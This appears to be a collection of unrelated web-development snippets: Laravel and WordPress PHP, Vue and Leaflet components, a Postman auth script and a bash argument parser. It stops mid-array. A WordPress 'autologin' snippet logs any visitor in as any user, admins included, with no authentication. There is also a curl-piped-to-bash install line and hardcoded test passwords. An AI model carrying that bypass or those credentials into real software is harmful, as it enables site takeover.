"hostage/hos1.wav",
"hostage/hos2.wav",
"hostage/hos3.wav",
"hostage/hos4.wav",
"hostage/hos5.wav",
"items/9mmclip1.wav",
"items/ammopickup2.wav",
"items/equip_nvg.wav",
"items/flashlight1.wav",
"items/gunpickup2.wav",
"items/kevlar.wav",
"items/nvg_off.wav",
"items/nvg_on.wav",
"items/suitchargeok1.wav",
"items/tr_kevlar.wav",
"items/weapondrop1.wav",
"items/smallmedkit1.wav",
"plats/train_use1.wav",
"plats/vehicle_ignition.wav",
"player/bhit_flesh-1.wav",
"player/bhit_flesh-2.wav",
"player/bhit_flesh-3.wav",
"player/bhit_helmet-1.wav",
"player/bhit_kevlar-1.wav",
"player/death6.wav",
"player/die1.wav",
"player/die2.wav",
"player/die3.wav",
"player/geiger1.wav",
"player/geiger2.wav",
"player/geiger3.wav",
"player/geiger4.wav",
"player/geiger5.wav",
"player/geiger6.wav",
"player/headshot1.wav",
"player/headshot2.wav",
"player/headshot3.wav",
"player/pl_die1.wav",
"player/pl_dirt1.wav",
"player/pl_dirt2.wav",
"player/pl_dirt3.wav",
"player/pl_dirt4.wav",
"player/pl_duct1.wav",
"player/pl_duct2.wav",
"player/pl_duct3.wav",
"player/pl_duct4.wav",
"player/pl_fallpain2.wav",
"player/pl_fallpain3.wav",
"player/pl_grate1.wav",
"player/pl_grate2.wav",
"player/pl_grate3.wav",
"player/pl_grate4.wav",
"player/pl_ladder1.wav",
"player/pl_ladder2.wav",
"player/pl_ladder3.wav",
"player/pl_ladder4.wav",
"player/pl_metal1.wav",
"player/pl_metal2.wav",
"player/pl_metal3.wav",
"player/pl_metal4.wav",
"player/pl_pain2.wav",
"player/pl_pain4.wav",
"player/pl_pain5.wav",
"player/pl_pain6.wav",
"player/pl_pain7.wav",
"player/pl_shot1.wav",
"player/pl_slosh1.wav",
"player/pl_slosh2.wav",
"player/pl_slosh3.wav",
"player/pl_slosh4.wav",
"player/pl_snow1.wav",
"player/pl_snow2.wav",
"player/pl_snow3.wav",
"player/pl_snow4.wav",
"player/pl_snow5.wav",
"player/pl_snow6.wav",
"player/pl_step1.wav",
"player/pl_step2.wav",
"player/pl_step3.wav",
"player/pl_step4.wav",
"player/pl_swim1.wav",
"player/pl_swim2.wav",
"player/pl_swim3.wav",
"player/pl_swim4.wav",
"player/pl_tile1.wav",
"player/pl_tile2.wav",
"player/pl_tile3.wav",
"player/pl_tile4.wav",
"player/pl_tile5.wav",
"player/pl_wade1.wav",
"player/pl_wade2.wav",
"player/pl_wade3.wav",
"player/pl_wade4.wav",
"player/sprayer.wav",
"weapons/357_cock1.wav",
"weapons/ak47-1.wav",
"weapons/ak47-2.wav",
"weapons/ak47_boltpull.wav",
"weapons/ak47_clipin.wav",
"weapons/ak47_clipout.wav",
"weapons/aug-1.wav",
"weapons/aug_boltpull.wav",
"weapons/aug_boltslap.wav",
"weapons/aug_clipin.wav",
"weapons/aug_clipout.wav",
"weapons/aug_forearm.wav",
"weapons/awp1.wav",
"weapons/awp_clipin.wav",
"weapons/awp_clipout.wav",
"weapons/awp_deploy.wav",
"weapons/boltdown.wav",
"weapons/boltpull1.wav",
"weapons/boltup.wav",
"weapons/bullet_hit1.wav",
"weapons/bullet_hit2.wav",
"weapons/c4_beep1.wav",
"weapons/c4_beep2.wav",
"weapons/c4_beep3.wav",
"weapons/c4_beep4.wav",
"weapons/c4_beep5.wav",
"weapons/c4_click.wav",
"weapons/c4_disarm.wav",
"weapons/c4_disarmed.wav",
"weapons/c4_explode1.wav",
"weapons/c4_plant.wav",
"weapons/clipin1.wav",
"weapons/clipout1.wav",
"weapons/de_clipin.wav",
"weapons/de_clipout.wav",
"weapons/de_deploy.wav",
"weapons/deagle-1.wav",
"weapons/deagle-2.wav",
"weapons/debris1.wav",
"weapons/debris2.wav",
"weapons/debris3.wav",
"weapons/dryfire_pistol.wav",
"weapons/dryfire_rifle.wav",
"weapons/elite_clipout.wav",
"weapons/elite_deploy.wav",
"weapons/elite_fire.wav",
"weapons/elite_leftclipin.wav",
"weapons/elite_reloadstart.wav",
"weapons/elite_rightclipin.wav",
"weapons/elite_sliderelease.wav",
"weapons/explode3.wav",
"weapons/explode4.wav",
"weapons/explode5.wav",
"weapons/famas-1.wav",
"weapons/famas-2.wav",
"weapons/famas-burst.wav",
"weapons/famas_boltpull.wav",
"weapons/famas_boltslap.wav",
"weapons/famas_clipin.wav",
"weapons/famas_clipout.wav",
"weapons/famas_forearm.wav",
"weapons/fiveseven-1.wav",
"weapons/fiveseven_clipin.wav",
"weapons/fiveseven_clipout.wav",
"weapons/fiveseven_slidepull.wav",
"weapons/fiveseven_sliderelease.wav",
"weapons/flashbang-1.wav",
"weapons/flashbang-2.wav",
"weapons/g3sg1-1.wav",
"weapons/g3sg1_clipin.wav",
"weapons/g3sg1_clipout.wav",
"weapons/g3sg1_slide.wav",
"weapons/galil-1.wav",
"weapons/galil-2.wav",
"weapons/galil_boltpull.wav",
"weapons/galil_clipin.wav",
"weapons/galil_clipout.wav",
"weapons/generic_reload.wav",
"weapons/glock18-1.wav",
"weapons/glock18-2.wav",
"weapons/grenade_hit1.wav",
"weapons/grenade_hit2.wav",
"weapons/grenade_hit3.wav",
"weapons/he_bounce-1.wav",
"weapons/hegrenade-1.wav",
"weapons/hegrenade-2.wav",
"weapons/knife_deploy1.wav",
"weapons/knife_hit1.wav",
"weapons/knife_hit2.wav",
"weapons/knife_hit3.wav",
"weapons/knife_hit4.wav",
"weapons/knife_hitwall1.wav",
"weapons/knife_slash1.wav",
"weapons/knife_slash2.wav",
"weapons/knife_stab.wav",
"weapons/m249-1.wav",
"weapons/m249-2.wav",
"weapons/m249_boxin.wav",
"weapons/m249_boxout.wav",
"weapons/m249_chain.wav",
"weapons/m249_coverdown.wav",
"weapons/m249_coverup.wav",
"weapons/m3-1.wav",
"weapons/m3_insertshell.wav",
"weapons/m3_pump.wav",
"weapons/m4a1-1.wav",
"weapons/m4a1_boltpull.wav",
"weapons/m4a1_clipin.wav",
"weapons/m4a1_clipout.wav",
"weapons/m4a1_deploy.wav",
"weapons/m4a1_silencer_off.wav",
"weapons/m4a1_silencer_on.wav",
"weapons/m4a1_unsil-1.wav",
"weapons/m4a1_unsil-2.wav",
"weapons/mac10-1.wav",
"weapons/mac10_boltpull.wav",
"weapons/mac10_clipin.wav",
"weapons/mac10_clipout.wav",
"weapons/mp5-1.wav",
"weapons/mp5-2.wav",
"weapons/mp5_clipin.wav",
"weapons/mp5_clipout.wav",
"weapons/mp5_slideback.wav",
"weapons/p228-1.wav",
"weapons/p228_clipin.wav",
"weapons/p228_clipout.wav",
"weapons/p228_slidepull.wav",
"weapons/p228_sliderelease.wav",
"weapons/p90-1.wav",
"weapons/p90_boltpull.wav",
"weapons/p90_clipin.wav",
"weapons/p90_clipout.wav",
"weapons/p90_cliprelease.wav",
"weapons/pinpull.wav",
"weapons/reload1.wav",
"weapons/reload3.wav",
"weapons/ric1.wav",
"weapons/ric2.wav",
"weapons/ric3.wav",
"weapons/ric4.wav",
"weapons/ric5.wav",
"weapons/ric_conc-1.wav",
"weapons/ric_conc-2.wav",
"weapons/ric_metal-1.wav",
"weapons/ric_metal-2.wav",
"weapons/scout_bolt.wav",
"weapons/scout_clipin.wav",
"weapons/scout_clipout.wav",
"weapons/scout_fire-1.wav",
"weapons/sg550-1.wav",
"weapons/sg550_boltpull.wav",
"weapons/sg550_clipin.wav",
"weapons/sg550_clipout.wav",
"weapons/sg552-1.wav",
"weapons/sg552-2.wav",
"weapons/sg552_boltpull.wav",
"weapons/sg552_clipin.wav",
"weapons/sg552_clipout.wav",
"weapons/sg_explode.wav",
"weapons/slideback1.wav",
"weapons/sliderelease1.wav",
"weapons/tmp-1.wav",
"weapons/tmp-2.wav",
"weapons/ump45-1.wav",
"weapons/ump45_boltslap.wav",
"weapons/ump45_clipin.wav",
"weapons/ump45_clipout.wav",
"weapons/usp1.wav",
"weapons/usp2.wav",
"weapons/usp_clipin.wav",
"weapons/usp_clipout.wav",
"weapons/usp_silencer_off.wav",
"weapons/usp_silencer_on.wav",
"weapons/usp_slideback.wav",
"weapons/usp_sliderelease.wav",
"weapons/usp_unsil-1.wav",
"weapons/xm1014-1.wav",
"weapons/zoom.wav",
"weapons/xbow_hit1.wav",
"weapons/mine_activate.wav",
"misc/godlike.wav",
"misc/headshot.wav",
"misc/holyshit.wav",
"misc/humiliation.wav",
"misc/killingspree.wav",
"misc/ludacrisskill.wav",
"misc/maytheforce.wav",
"misc/megakill.wav",
"misc/monsterkill.wav",
"misc/multikill.wav",
"misc/oneandonly.wav",
"misc/prepare.wav",
"misc/rampage.wav",
"misc/ultrakill.wav",
"misc/wickedsick.wav",
"misc/prepare.wav",
"radio/ct_fireinhole.wav",
"misc/haha.wav"
],
"mapListModel": null,
"mapListSound": null,
"premium": false,
"voice": 1,
"request_region_flag": "br"
};
</script>
<!-- <canvas id="canvas-test" style="border:solid 1px red;"></canvas>
<script>
let c = document.getElementById("canvas-test");
let ctx = c.getContext("2d");
let img = Object.assign(document.createElement('img'), {
src: 'data:',
});
ctx.drawImage(img, 10, 10);
</script> -->
<div style="display:flex; align-items:center; position:fixed; top:0; left:0; width:100%; height:100%; z-indeX:-1;">
<div style="min-width:100%; max-width:100%; text-align:center;">
<img style="width:100%; height:auto;" src="" alt="">
</div>
</div>
</body>
</html>
function dd(...$args) {
foreach($args as $arg) {
$arg_type = gettype($arg);
echo '<pre style="font-family:monospace;">', $arg_type, ': ', print_r($arg, true), '</pre>';
}
}
<?php
namespace App\Console\Commands;
use Illuminate\Console\Command;
class ResetPassword extends Command
{
/**
* The name and signature of the console command.
*
* @var string
*/
protected $signature = 'reset-password';
/**
* The console command description.
*
* @var string
*/
protected $description = 'Reset password';
/**
* Create a new command instance.
*
* @return void
*/
public function __construct()
{
parent::__construct();
}
/**
* Execute the console command.
*
* @return int
*/
public function handle()
{
$find = $this->ask('Find by ID or email (empty to create new)');
$user = (new \App\Models\Admin\Users)->where('id', $find)->orWhere('email', $find)->firstOrNew();
if (!$user->id) {
$user->name = $this->ask('User name');
$user->email = $this->ask('User e-mail');
$user->two_step = false;
}
$user->password = \Hash::make($this->ask('Password'));
$user->save();
$this->info("User #{$user->id} saved");
}
}
dump(vsprintf(str_replace(['?'], array('\'%s\''), $query->toSql()), $query->getBindings()));
class Auth {
static getCredential(credentialIndex) {
const users = {
user: {
email: 'user@grr.la',
password: '123456',
},
adm: {
email: 'admin@grr.la',
password: '123456',
},
};
return users[credentialIndex] || false;
}
static getUrl(urlIndex) {
const urls = {
prod: 'https://api.website.com',
hml: 'https://api.homol.website.com',
localhost: 'http://localhost',
};
return urls[urlIndex] || false;
}
static requestAs(credentialIndex, urlIndex) {
const credential = Auth.getCredential(credentialIndex);
const url = Auth.getUrl(urlIndex);
if (!credential || !url) return;
Auth.setParam(`baseUrl`, url);
const access_token_name = `access_token_${credentialIndex}_${urlIndex}`;
let access_token = Auth.getParam(access_token_name, false);
if (! access_token) {
console.log(`access_token ${credentialIndex}@${urlIndex}:`, 'gerando...');
const requestData = {
url: `${url}/api/login`,
method: 'POST',
header: 'Content-Type:application/json',
body: {
mode: 'application/json',
raw: JSON.stringify(credential),
},
};
pm.sendRequest(requestData, (req, res) => {
const data = res.json();
Auth.setParam(`access_token`, data.access_token);
Auth.setParam(access_token_name, data.access_token);
access_token = data.access_token;
});
}
console.log(`access_token ${credentialIndex}@${urlIndex}:`, access_token);
}
static getParam(name, defaultValue=false) {
return pm.collectionVariables.get(name) || defaultValue;
}
static setParam(name, value) {
return pm.collectionVariables.set(name, value);
}
}
// Send request as "adm" to "hml" url
Auth.requestAs('adm', 'hml');
{
"singleAttributePerLine": false,
"printWidth": 120
}
: '
In this example, we create a "args_array" with params passed by command line:
command --hello "World"
result: ([--hello]="World" [--message]="" )
command --message --hello "Again"
result: ([--hello]="Again" [--message]="1" )
command --message "Im happy" --hello
result: ([--hello]="1" [--message]="Im happy" )
'
declare -A args_array
args_array["--message"]=""
args_array["--hello"]=""
arg_index=1
for arg in "$@"; do
if [[ $arg == --* ]]; then
arg_next=$(($arg_index+1))
arg_value=${!arg_next}
if [ -z "$arg_value" ]; then
arg_value="1"
fi
args_array[$arg]="1"
if [[ $arg_value != --* ]]; then
args_array[$arg]=$arg_value
fi
fi
((arg_index++))
done
declare -p args_array
curl -s "https://laravel.build/laravel" | bash
<template>
<v-app class="v-app-layout">
<v-defaults-provider :defaults="defaultsProvider">
<!-- loading -->
<v-layout v-if="!props.ready">
<slot name="loading" v-bind="slotBind()">
<div :class="props.loadingClass">
<v-icon icon="svg-spinners:3-dots-fade" size="30" />
</div>
</slot>
</v-layout>
<!-- view=admin -->
<v-layout class="rounded rounded-md" v-if="props.ready">
<v-navigation-drawer
v-model="nav.drawer"
width="300"
elevation="0"
:class="`v-app-layout__navigation ${props.navigationClass}`"
border="0"
>
<slot name="navigation" v-bind="slotBind()"></slot>
</v-navigation-drawer>
<!-- Mobile -->
<v-main v-touch="layout.vTouch" v-if="display.mobile.value">
<div class="d-flex flex-column" style="height: 100vh">
<v-slide-y-transition>
<div
:class="`d-flex align-center pa-2 ${props.headerClass}`"
style="gap: 10px"
v-if="layout.headerShow"
>
<v-btn
icon="ci:hamburger"
size="30"
flat
@click="nav.drawer = !nav.drawer"
class="d-lg-none"
/>
<slot name="header" v-bind="slotBind()"></slot>
</div>
</v-slide-y-transition>
<div style="flex-grow: 1; overflow-x: hidden; overflow-y: auto">
<slot name="main" v-bind="slotBind()"></slot>
</div>
<v-expand-transition>
<div
:class="`d-flex align-center pa-2 ${props.headerClass}`"
style="gap: 10px"
v-if="slots.footer && layout.footerShow"
>
<slot name="footer" v-bind="slotBind()"></slot>
</div>
</v-expand-transition>
</div>
</v-main>
<!-- Desktop -->
<v-main v-if="!display.mobile.value">
<div class="d-flex flex-column" style="height: 100vh">
<div
:class="`d-flex align-center pa-3 ${props.headerClass}`"
style="gap: 15px"
v-if="slots.header"
>
<v-defaults-provider
:defaults="{ VBtn: { flat: true, size: 30 } }"
>
<slot name="header" v-bind="slotBind()"></slot>
</v-defaults-provider>
</div>
<div
:class="`flex-grow-1 pa-3 ${props.mainClass}`"
style="overflow: auto"
>
<slot name="main" v-bind="slotBind()"></slot>
</div>
<div :class="`${props.footerClass}`">
<slot name="footer" v-bind="slotBind()"></slot>
</div>
</div>
</v-main>
</v-layout>
</v-defaults-provider>
</v-app>
</template>
<script setup>
import {
reactive,
defineProps,
defineEmits,
defineExpose,
useSlots,
} from "vue";
const props = defineProps({
ready: { type: Boolean, default: true },
view: { type: String, default: "admin" },
defaultsProvider: { type: Object, default: () => ({}) },
loadingClass: {
type: String,
default: "w-100 d-flex align-center justify-center",
},
navigationClass: { type: String, default: "" },
headerClass: { type: String, default: "bg-white" },
mainClass: { type: String, default: "" },
footerClass: { type: String, default: "" },
});
const slots = useSlots();
const view = reactive({
name: props.view,
set(name) {
emit("update:view", name);
view.name = name;
},
});
const emit = defineEmits(["update:view"]);
import { useTitle } from "@vueuse/core";
const title = useTitle();
import { useDisplay } from "vuetify";
const display = useDisplay();
import { useSwipe } from "@vueuse/core";
const nav = reactive({
drawer: null,
items: [
{ title: "Home", to: "/admin" },
{ title: "Pages", to: "/admin/page" },
{ title: "User", to: "/admin/user" },
{ title: "Test", to: "/admin/test" },
],
});
const layout = reactive({
headerShow: true,
footerShow: true,
vTouch: {
up: () => {
layout.headerShow = false;
layout.footerShow = true;
},
down: () => {
layout.headerShow = true;
layout.footerShow = false;
},
},
});
const defaultsProvider = {
VTextField: {
variant: "outlined",
},
// VNavigationDrawer: { border: 0 },
...props.defaultsProvider,
};
const slotBind = (merge = {}) => {
return {
defaultsProvider,
view,
...merge,
};
};
defineExpose({ view });
</script>
<style lang="scss">
@import url("https://fonts.googleapis.com/css2?family=Public+Sans:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&display=swap");
.v-app-layout {
* {
font-family: "Public Sans", sans-serif;
}
&__navigation .v-navigation-drawer__content {
display: flex;
flex-direction: column;
}
&__bg-pattern {
--s: 41px; /* control the size */
--c1: #f2c45a;
--c2: #5e8c6a;
--c3: #88a65e;
--_g: , var(--c1) 25%, var(--c2) 0 150deg, var(--c1) 0 240deg, #0000 0;
background: conic-gradient(
from 60deg at calc(3.866 * var(--s)),
var(--c2) 60deg,
#0000 0
)
calc(1.366 * var(--s)) calc(1.366 * var(--s)),
conic-gradient(
from 240deg at calc(0.866 * var(--s)),
var(--c2) 60deg,
#0000 0
)
calc(2.366 * var(--s)) calc(1.366 * var(--s)),
conic-gradient(at var(--s) var(--s), #0000 75%, var(--c1) 0)
calc(1.366 * var(--s)) calc(var(--s) / -2),
conic-gradient(
from 30deg at calc(-0.288 * var(--s)) 50%,
#0000 120deg,
var(--c3) 0
),
conic-gradient(
from 90deg at calc(3.732 * var(--s)) calc(1.866 * var(--s)),
var(--c3) 120deg,
#0000 0
),
conic-gradient(
from -30deg at calc(3.732 * var(--s)) calc(0.866 * var(--s)),
var(--c3) 120deg,
var(--c1) 0 210deg,
#0000 0
),
conic-gradient(from 150deg at calc(0.866 * var(--s)) var(--_g)),
conic-gradient(from -30deg at calc(2.866 * var(--s)) var(--_g)) var(--c3);
background-size: calc(4.732 * var(--s)) calc(2.732 * var(--s));
}
}
</style>
// https://twitter.com/thomasfindlay94/status/1678310862417690624/photo/1
const app = Array.from(document.querySelectorAll('*')).find((e) => e.__vue_app__).__vue_app__;
const devtools = window.__VUE_DEVTOOLS_GLOBAL_HOOK__;
devtools.enabled = true;
devtools.emit('app:init', app, app.version, {});
<template>
<div>Hello</div>
</template>
<script setup>
import { reactive, defineProps, defineEmits } from "vue";
const props = defineProps({
modelValue: { type: [String], default: "" },
});
const emit = defineEmits(["update:modelValue"]);
</script>
const createLeaflet = (options = {}) => ({
install(app, options = {}) {
const base = {
methods: {
getMap() {
let found = false;
let currentComp = this;
while (currentComp && !found) {
if (currentComp.map) {
return currentComp.map;
}
currentComp = currentComp.$parent;
}
},
debounce(id, time, callback) {
window._debounce = window._debounce || {};
if (window._debounce[id]) clearTimeout(window._debounce[id]);
window._debounce[id] = setTimeout(callback, time);
},
getFragment(node) {
const fragment = new DocumentFragment();
fragment.append(node);
const html = document.createElement('div');
html.append(fragment);
return html;
},
},
};
// l-map
app.component('l-map', {
extends: base,
props: {
center: {
type: Array,
default: () => ([0, 0]),
},
zoom: {
type: Number,
default: 10,
},
osm: {
type: [ Boolean, Object ],
default: false,
},
},
watch: {
$props: {deep:true, handler(props) {
if (props.zoom != this.map.getZoom()) {
this.map.setZoom(props.zoom);
}
}},
},
data: () => ({
map: false,
ready: false,
}),
methods: {
async getOsmData() {
if (!this.osm) return;
if (this.map.getZoom()<16) return;
this.debounce('vue3_leaflet_get_osm_data', 1000, async () => {
const bounds = this.map.getBounds();
const params = {
data: '[out:json];out;',
bbox: [
bounds.getWest(),
bounds.getSouth(),
bounds.getEast(),
bounds.getNorth(),
].join(','),
};
const { data } = await axios.get('https://api.openstreetmap.org/api/0.6/map', { params });
this.$emit('update:osm', data);
});
},
},
async mounted() {
this.map = L.map(this.$el, { center: this.center, zoom: this.zoom });
await this.getOsmData();
this.map.on('moveend', async ev => {
this.$emit('update:center', Object.values(this.map.getCenter()));
await this.getOsmData();
});
this.map.on('zoomend', async ev => {
this.$emit('update:zoom', this.map.getZoom());
await this.getOsmData();
});
[
'zoomlevelschange', 'resize', 'unload', 'viewreset', 'load', 'zoomstart', 'movestart', 'zoom', 'move', 'zoomend', 'moveend',
'popupopen', 'popupclose', 'autopanstart', 'tooltipopen', 'tooltipclose', 'locationerror', 'locationfound', 'click', 'dblclick',
'mousedown', 'mouseup', 'mouseover', 'mouseout', 'mousemove', 'contextmenu', 'keypress', 'keydown', 'keyup', 'preclick', 'zoomanim',
].forEach(evt => {
this.map.on(evt, ev => this.$emit(evt, ev));
});
this.ready = true;
},
template: `<div style="width:100%; height:300px; position:relative;"><slot v-if="ready"></slot></div>`,
});
// l-tile-layer
app.component('l-tile-layer', {
extends: base,
props: {
url: { type: String, default: 'https://tile.openstreetmap.org/{z}/{x}/{y}.png'},
attribution: { type: String, default: ''},
},
watch: {
$props: {deep:true, handler(props) {
this.tileLayer.setUrl(props.url);
}},
},
data: () => ({ tileLayer: false }),
mounted() {
this.tileLayer = L.tileLayer(this.url, {}).addTo(this.$parent.map);
},
});
// l-marker
app.component('l-marker', {
extends: base,
props: {
center: {type: Array, default: () => ([0, 0])},
icon: { type: [Boolean, String, Object], default: false },
keyboard: { type: Boolean, default: true },
title: { type: String, default: '' },
alt: { type: String, default: '' },
zIndexOffset: { type: Number, default: 0 },
opacity: { type: Number, default: 1 },
riseOnHover: { type: Boolean, default: false },
riseOffset: { type: Number, default: 250 },
pane: { type: String, default: 'markerPane' },
shadowPane: { type: String, default: 'shadowPane' },
bubblingMouseEvents: { type: Boolean, default: false },
autoPanOnFocus: { type: Boolean, default: true },
draggable: { type: Boolean, default: false },
autoPan: { type: Boolean, default: false },
autoPanPadding: { type: Object, default: L.point(50, 50) },
autoPanSpeed: { type: Number, default: 10 },
},
watch: {
$props: {deep:true, handler(props) {
this.marker.setIcon(this.parseIcon(props.icon));
}},
},
data: () => ({
marker: false,
}),
methods: {
parsedProps() {
let props = { ...this.$props };
props.icon = this.parseIcon(props.icon);
return props;
},
parseIcon(icon) {
if (this.$slots.icon) {
return L.divIcon({
iconSize: null,
html: this.getFragment(this.$refs.slotIcon),
});
}
if (icon==false) {
return L.icon({
iconUrl: 'https://unpkg.com/leaflet@1.9.3/dist/images/marker-icon.png',
// iconSize: [25, 41],
// iconAnchor: [22, 94],
// popupAnchor: [-3, -76],
shadowUrl: 'https://unpkg.com/leaflet@1.9.3/dist/images/marker-shadow.png',
// shadowSize: [68, 95],
// shadowAnchor: [22, 94]
});
}
if (typeof icon=='string') {
return L.icon({
iconUrl: this.$props.icon,
iconSize: [40, 40],
iconAnchor: [20, 20],
});
}
if (typeof icon=='object') {
return L.icon(this.$props.icon);
}
},
},
beforeUnmount() {
this.marker.removeFrom(this.$parent.map);
},
mounted() {
this.marker = L.marker(this.center, this.parsedProps());
this.marker.addTo(this.getMap());
this.marker.on('moveend', ev => this.$emit('update:center', Object.values(ev.sourceTarget._latlng)));
['move', 'dragstart', 'movestart', 'drag', 'dragend', 'moveend', 'click'].forEach(evt => {
this.marker.on(evt, ev => this.$emit(evt, ev));
});
},
template: `<div>
<slot></slot>
<div ref="slotIcon"><slot name="icon"></slot></div>
</div>`,
});
const overlay = {
extends: base,
template: `<div><slot></slot></div>`,
props: {
modelValue: {type:Boolean, default:false},
center: {type:Array, default: () => ([0, 0])},
},
data: () => ({ overlay: false }),
methods: {
overlayCreate() {},
},
computed: {
propsCenter: {
get() {
let center = [ ...this.center ];
if (center[0]==0 && center[1]==0) {
center = [...this.$parent.center ];
}
return center;
},
set(value) { this.emit('update:center', value); },
},
},
mounted() {
this.overlay = this.overlayCreate();
// if (this.modelValue) {
// this.overlay.openPopup();
// }
},
};
// l-popup
app.component('l-popup', {
extends: overlay,
methods: {
overlayCreate() {
return L.popup(this.propsCenter, {
content: this.getFragment(this.$el),
});
// }).addTo(this.getMap());
},
},
});
// l-tooltip
app.component('l-tooltip', {
extends: overlay,
methods: {
overlayCreate() {
return L.tooltip(this.propsCenter, {
content: this.getFragment(this.$el),
});
// }).addTo(this.getMap());
},
},
});
},
});
/* Dependencies: Vue3 + Vuetify3 + Dayjs */
const vCalendar = {
props: {
modelValue: {
type: [Boolean, String],
default: dayjs().format('YYYY-MM-DD'),
},
},
computed: {
month: {
set(value) {},
get() {
const d = dayjs(this.modelValue);
const r = {};
r.year = d.format('YYYY');
r.month = d.format('MM');
r.monthName = d.format('MMMM');
r.daysInMonth = d.daysInMonth();
r.firstDay = d.startOf("month").day();
r.weekdays = dayjs.weekdays().map(weekday => weekday.substring(0, 3));
r.days = (() => {
const dayDefault = {id:null, day:null, dayName:null, dayAbbr:null};
let days=[];
for(let i=0; i<r.firstDay; i++) {
days.push({ ...dayDefault });
}
for(let i=1; i<=r.daysInMonth; i++) {
const dd = d.set('date', i);
let day = { ...dayDefault };
day.id = dd.format();
day.day = dd.date();
day.dayName = dayjs.weekdays()[ dd.day() ];
day.dayAbbr = day.dayName.substring(0, 3);
days.push(day);
}
const chunk = (arr, size) => Array.from({ length: Math.ceil(arr.length / size) }, (v, i) => arr.slice(i * size, i * size + size));
return chunk(days, 7);
})();
return r;
},
},
},
methods: {
monthAdd(n) {
const month = dayjs(this.modelValue).add(n, 'month').format('YYYY-MM-DD');
this.$emit('update:modelValue', { month });
},
},
template: `<div>
<v-table>
<template #default>
<thead>
<tr>
<th colspan="2" class="p-0 text-left">
<v-btn flat :size="30" icon="mdi-chevron-left" @click="monthAdd(-1)"></v-btn>
</th>
<th colspan="3" class="p-0 text-center">
{{ month.year }} {{ month.monthName }}
</th>
<th colspan="2" class="p-0 text-right">
<v-btn flat :size="30" icon="mdi-chevron-right" @click="monthAdd(1)"></v-btn>
</th>
</tr>
</thead>
<tbody>
<template v-for="wdays in month.days">
<tr>
<template v-for="d in wdays">
<td class="text-center pa-0">
<v-btn block flat :size="35">{{ d.day }}</v-btn>
</td>
</template>
</tr>
</template>
</tbody>
</template>
</v-table>
</div>`,
}
<v-dialog>
<template #activator="bind">
<v-btn v-bind="bind.props">Dialog</v-btn>
</template>
<v-card>
<v-card-text>
Hello
</v-card-text>
</v-card>
</v-dialog>

add_action('add_meta_boxes', function() { foreach (['page', 'post'] as $post_type) { add_meta_box('postbox-custom-id', 'Title', function() { ?>Conteúdo<?php }, $post_type); } });

/* Add table fields */ function my_post_type_column($post_types, $field_name, $callback) {

$post_types = is_array($post_types)? $post_types: [$post_types];
$field_id = uniqid('field_');

foreach($post_types as $post_type) {
	add_filter("manage_{$post_type}_posts_columns", function($columns) use($field_id, $field_name) {
		$field_date = $columns['date'];
		unset($columns['date']);
		$columns[ $field_id ] = $field_name;
		$columns['date'] = $field_date;
		return $columns;
	});

	add_action("manage_{$post_type}_posts_custom_column" , function($column, $post_id) use($field_id, $field_name, $callback) {
		global $post;
		if ($column==$field_id AND is_callable($callback)) {
			call_user_func($callback, $post);
		}
	}, 10, 2);
}

}

my_post_type_column(['product'], 'test-field', function($post) { echo 'This is the test field'; });

/* Add menu | /wp-admin/admin.php?page=helper_menu_page */ add_action('admin_menu', function() { add_menu_page('Helper Menu Page', 'Helper Menu Page', 'manage_options', 'helper_menu_page', function() { ?>

Hello World
<?php }, 'dashicons-admin-users', 10); });

/* Add submenu | /wp-admin/options-general.php?page=wp-translations-search */ add_action('admin_menu', function() { add_submenu_page('options-general.php', 'Translations', 'Translations', 'manage_options', 'wp-translations-search', function() { ?>

Hello World
<?php }); });

// Autologin // go to yoursite.com?autologin if (isset($_GET['autologin'])) { add_action('init', function() { if ($user_id = $_GET['autologin']) { $user = get_user_by('id', $user_id); $user = $user->data; wp_set_current_user($user_id, $user->user_login); wp_set_auth_cookie($user_id); do_action('wp_login', $user->user_login, $user); wp_redirect(admin_url()); }

	else {
		foreach(get_users() as $user) {
			echo "<div><a href='?autologin={$user->ID}'>{$user->data->display_name}</a></div>";
		} die;
	}

});

}

/* Esse exemplo mostra como customizar a página /wp-admin/edit.php do Wordpress, responsável pela listagem de posts. Aqui, vamos supor que o que está sendo editado é um post_type=test, portanto, a url para esse teste seria /wp-admin/edit.php?post_type=test */

add_action('load-edit.php', function() { add_filter('views_edit-test', function() { echo 'Conteúdo da lista';

// Inclui o rodapé do admin e finaliza a aplicação
include( ABSPATH . 'wp-admin/admin-footer.php' ); die;

}); });

class Custom {

public $singular = 'Custom';
public $plural = 'Customs';
public $post_type = 'custom';
public $menu_position = 10;
public $public = true;
public $publicly_queryable = true;
public $show_ui = true;
public $show_in_menu = true;
public $menu_icon = 'none'; // https://developer.wordpress.org/resource/dashicons/
public $supports = ['title', 'editor', 'author', 'thumbnail', 'excerpt', 'comments', 'elementor'];

/* menu_position:
5 – below Posts
10 – below Media
15 – below Links
20 – below Pages
25 – below comments
60 – below first separator
65 – below Plugins
70 – below Users
75 – below Tools
80 – below Settings
100 – below second separator
*/

static function register()
{
    $self = new static; 
    register_post_type($self->post_type, [
        'public'             => $self->public,
        'publicly_queryable' => $self->publicly_queryable,
        'show_ui'            => $self->show_ui,
        'show_in_menu'       => $self->show_in_menu,
        'query_var'          => true,
        'menu_icon'          => $self->menu_icon,
        'rewrite'            => array('slug' => $self->post_type),
        // 'capability_type'    => 'post',
        'has_archive'        => true,
        'hierarchical'       => false,
        'menu_position'      => $self->menu_position,
        'supports'           => $self->supports,
        'labels'             => [
            'name'                  => $self->plural,
            'singular_name'         => $self->singular,
            'menu_name'             => $self->plural,
            'name_admin_bar'        => $self->singular,
            'add_new'               => "Novo(a) {$self->singular}",
            'add_new_item'          => "Novo(a) {$self->singular}",
            'new_item'              => "Novo(a) {$self->singular}",
            'edit_item'             => "Editar {$self->singular}",
            'view_item'             => "Ver {$self->singular}",
            'all_items'             => "Todos os {$self->plural}",
            'search_items'          => "Pesquisar {$self->plural}",
            'parent_item_colon'     => "Pai {$self->plural}:",
            'not_found'             => "Nenhum {$self->plural} encontrado.",
            'not_found_in_trash'    => "Nenhum {$self->plural} encontrado na lixeira.",
            'featured_image'        => "Imagem de capa de {$self->singular}",
            'set_featured_image'    => "Alterar como imagem de capa",
            'remove_featured_image' => "Remover imagem de capa",
            'use_featured_image'    => "Usar como imagem de capa",
            'archives'              => "Arquivos de {$self->singular}",
            'insert_into_item'      => "Inserir dentro de {$self->singular}",
            'uploaded_to_this_item' => "Enviado para {$self->singular}",
